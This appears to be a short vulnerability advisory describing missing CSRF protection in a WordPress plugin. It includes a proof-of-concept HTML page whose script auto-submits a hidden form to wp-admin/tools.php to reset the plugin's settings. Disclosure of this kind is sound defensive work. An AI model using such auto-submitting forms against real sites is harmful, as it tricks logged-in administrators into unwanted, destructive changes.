Description The plugin does not have CSRF checks in various places, which could allow attackers to make logged in admins perform unwanted actions, such as reset the plugin’s settings and update its API key via CSRF attacks.
<html>
<body>
<form action="https://example.com/wp-admin/tools.php">
<input type="hidden" name="page" value="poeditor" />
<input type="hidden" name="do" value="clean" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>